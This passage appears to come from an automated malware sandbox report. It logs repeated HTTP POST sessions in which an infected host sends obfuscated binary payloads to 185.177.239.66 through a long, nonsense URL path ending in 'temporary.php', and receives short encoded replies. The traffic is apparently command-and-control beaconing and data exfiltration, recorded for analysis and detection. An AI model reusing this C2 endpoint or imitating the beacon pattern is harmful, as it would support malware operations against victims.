                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2192
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:07.593512058 CET2192OUTData Raw: 59 59 43 59 5b 55 52 5c 5e 5c 50 55 50 5a 5a 5c 5a 5c 5b 5b 54 50 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YYCY[UR\^\PUPZZ\Z\[[TPUXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9+!6$!<053=*"$=W)=-%&.5-Y(0,<-.Y#,Z!+
                                                                                        Jan 8, 2025 18:09:07.929986954 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:08.062575102 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:07 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 39 5f 25 3b 2a 05 37 38 0f 0f 2e 03 23 01 33 3c 39 15 2a 0e 27 13 2a 55 38 06 3f 3b 0a 5b 3f 5d 2e 06 27 5a 2a 05 22 2f 21 5d 23 3a 2c 5f 02 12 25 1b 3c 0c 33 0d 29 11 33 5b 2b 27 07 59 23 0b 29 05 2a 20 32 54 35 17 3c 14 32 33 22 54 30 1f 05 10 28 07 3b 5c 38 10 31 10 35 29 21 50 0c 12 23 0b 36 01 37 0c 21 5e 35 16 3f 01 2a 1c 26 1b 35 0b 31 39 23 5f 20 23 3c 0c 27 23 2f 0b 25 5e 28 55 27 06 37 5f 25 3a 20 52 2c 38 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 989_%;*78.#3<9*'*U8?;[?].'Z*"/!]#:,_%<3)3[+'Y#)* 2T5<23"T0(;\815)!P#67!^5?*&519#_ #<'#/%^(U'7_%: R,8 S"-S0UQ0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        29192.168.2.450036185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:07.798317909 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:08.164318085 CET2596OUTData Raw: 5c 59 43 5d 5e 5f 52 5d 5e 5c 50 55 50 5e 5a 51 5a 53 5b 5b 54 52 55 5a 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \YC]^_R]^\PUP^ZQZS[[TRUZTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:>!5Y0"$'5/>9"'[8W)'*.>$6U,?$/,9.Y#,Z!
                                                                                        Jan 8, 2025 18:09:08.469192982 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:08.598748922 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:08 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        30192.168.2.450037185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:08.772443056 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:09.162511110 CET2596OUTData Raw: 59 5d 43 59 5e 59 57 50 5e 5c 50 55 50 5f 5a 50 5a 5f 5b 5e 54 51 55 5c 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y]CY^YWP^\PUP_ZPZ_[^TQU\TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9_+2.%!(^06 >"'>7=+=!&-&9<''8..Y#,Z!?
                                                                                        Jan 8, 2025 18:09:09.454893112 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:09.586425066 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:09 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        31192.168.2.450038185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:09.708439112 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:10.074676037 CET2596OUTData Raw: 5c 5f 43 5a 5e 5a 57 51 5e 5c 50 55 50 58 5a 5b 5a 52 5b 58 54 51 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \_CZ^ZWQ^\PUPXZ[ZR[XTQU^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9+1&$ 3<>9X0=8U=?)>:&-%: X0//--.Y#,Z!#
                                                                                        Jan 8, 2025 18:09:10.372292042 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:10.502743959 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:10 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        32192.168.2.450039185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:10.635338068 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2592
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:10.983937979 CET2592OUTData Raw: 59 5a 46 59 5b 5f 57 5d 5e 5c 50 55 50 59 5a 5c 5a 5d 5b 59 54 52 55 5e 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YZFY[_W]^\PUPYZ\Z][YTRU^TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9*1_$<%&3*3=(*V*W0*W9<<X0,$Z:-.Y#,Z!3
                                                                                        Jan 8, 2025 18:09:11.337697983 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:11.470454931 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:11 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        33192.168.2.450040185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:11.600148916 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:11.952824116 CET2596OUTData Raw: 59 5c 43 5a 5b 5c 57 5d 5e 5c 50 55 50 5d 5a 50 5a 5a 5b 5a 54 56 55 50 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y\CZ[\W]^\PUP]ZPZZ[ZTVUPTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9=)['T(^0%$])%'[(*Y?)>!'>1-$X%?//=.Y#,Z!7
                                                                                        Jan 8, 2025 18:09:12.299433947 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:12.432261944 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:12 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        34192.168.2.450041185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:12.568342924 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2592
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:12.921427011 CET2592OUTData Raw: 59 58 43 5d 5b 54 57 5d 5e 5c 50 55 50 59 5a 51 5a 5c 5b 5a 54 56 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: YXC][TW]^\PUPYZQZ\[ZTVUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:==['+%% ***3[;>?$*-&R&>:T9?X0'9=.Y#,Z!
                                                                                        Jan 8, 2025 18:09:13.231827974 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:13.363259077 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        35192.168.2.450042185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:13.105299950 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2192
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:13.452691078 CET2192OUTData Raw: 5c 5a 43 52 5b 55 57 51 5e 5c 50 55 50 5b 5a 5d 5a 5b 5b 54 54 51 55 5b 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \ZCR[UWQ^\PUP[Z]Z[[TTQU[TR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P:*1&3T Z$$*9"'S*<4(>$=*U.<8[$,Z:.Y#,Z!/
                                                                                        Jan 8, 2025 18:09:13.768513918 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:13.918092012 CET349INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:13 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 39 38 0d 0a 0f 12 39 5e 32 06 03 59 20 3b 26 1f 39 2e 24 5a 30 06 22 07 3e 30 01 5d 3e 0d 2c 07 3f 2b 3c 1d 3c 2b 0f 14 33 3c 03 10 36 3f 2e 04 23 2a 2c 5f 02 12 26 41 2b 54 2b 0c 28 3f 0e 04 2a 09 07 12 34 32 36 5b 2b 0d 35 0a 22 3a 3c 5c 31 0a 22 1c 30 57 23 53 28 00 09 17 3b 2d 31 5b 22 03 21 50 0c 12 23 0a 22 16 1a 51 35 38 3d 5c 28 28 22 59 26 43 2a 52 32 2a 37 59 34 30 3b 56 30 20 28 53 25 28 09 0a 24 38 09 5b 25 17 2b 09 39 28 20 53 22 01 2d 53 0e 30 55 51 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 989^2Y ;&9.$Z0">0]>,?+<<+3<6?.#*,_&A+T+(?*426[+5":<\1"0W#S(;-1["!P#"Q58=\(("Y&C*R2*7Y40;V0 (S%($8[%+9( S"-S0UQ0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        36192.168.2.450043185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:13.495764017 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:13.843781948 CET2596OUTData Raw: 5c 5e 43 52 5b 5e 57 5c 5e 5c 50 55 50 58 5a 5b 5a 5c 5b 5a 54 54 55 58 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: \^CR[^W\^\PUPXZ[Z\[ZTTUXTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9X>08'8>)Y3>4T=?;)-%3-.?$(.=.Y#,Z!#
                                                                                        Jan 8, 2025 18:09:14.168071032 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:14.298655033 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:14 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        37192.168.2.450044185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:14.429406881 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:14.786175966 CET2596OUTData Raw: 59 5f 46 5e 5e 58 52 5f 5e 5c 50 55 50 50 5a 58 5a 5d 5b 5f 54 55 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y_F^^XR_^\PUPPZXZ][_TUUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9=1=Y'T<Z%&;(*13=4>U(>3=":?;%/,Z..Y#,Z!
                                                                                        Jan 8, 2025 18:09:15.123116970 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:15.254828930 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        38192.168.2.450045185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:15.399936914 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:15.749696970 CET2596OUTData Raw: 59 5f 46 5a 5e 5d 57 5b 5e 5c 50 55 50 5a 5a 5b 5a 5e 5b 58 54 53 55 51 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
                                                                                        Data Ascii: Y_FZ^]W[^\PUPZZ[Z^[XTSUQTR]]VZ^RBZ[YZ]VY\]WQ_]V[QZ\FASSTT^QQWVR_^SY^VRTS_XZ\XR\SZPU^S[]]WY^XY^[PZXZW__BP_TC]U[YZXFQT^[UR]S]PYP[W]^[QYZ]^]YVXP^ZSXZTZ^YVYBH[V\_PPAUXXV]YRTD_R^\UU_[\_XR^P9>!$"0_068\)*.3>+*;T=.)'[694Z08_9.Y#,Z!+
                                                                                        Jan 8, 2025 18:09:16.094341993 CET25INHTTP/1.1 100 Continue
                                                                                        Jan 8, 2025 18:09:16.226859093 CET200INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Wed, 08 Jan 2025 17:09:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Vary: Accept-Encoding
                                                                                        Data Raw: 34 0d 0a 3d 5a 40 56 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 4=Z@V0


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        39192.168.2.450046185.177.239.6680
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jan 8, 2025 18:09:16.347830057 CET575OUTPOST /javascript3Public8/_Uploadsline0/Cpu1/ProtectWindowshttpLongpoll/1Python/Traffic8Game/Longpolldb1vm/defaultwordpress/Cpuwordpressjavascript/universalgameGeoEternal/Generatortest/3/SqlcpuProvider/wordpress7Python/Pollvm/toTrack/Test/DefaultImageGame7/Protect/eternalHttpwindowsUploadsDownloadstemporary.php HTTP/1.1
                                                                                        Content-Type: application/octet-stream
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                                                        Host: 185.177.239.66
                                                                                        Content-Length: 2596
                                                                                        Expect: 100-continue
                                                                                        Jan 8, 2025 18:09:16.703178883 CET2596OUTData Raw: 59 59 46 5e 5b 55 57 51 5e 5c 50 55 50 50 5a 59 5a 5b 5b 5b 54 52 55 5c 54 52 5d 5d 56 5a 5e 52 42 5a 5b 59 5a 5d 56 59 5c 5d 57 51 5f 5d 56 5b 51 5a 5c 46 41 53 53 54 54 5e 51 51 57 56 52 5f 5e 53 59 5e 56 52 54 53 5f 58 5a 5c 58 52 5c 53 5a 50
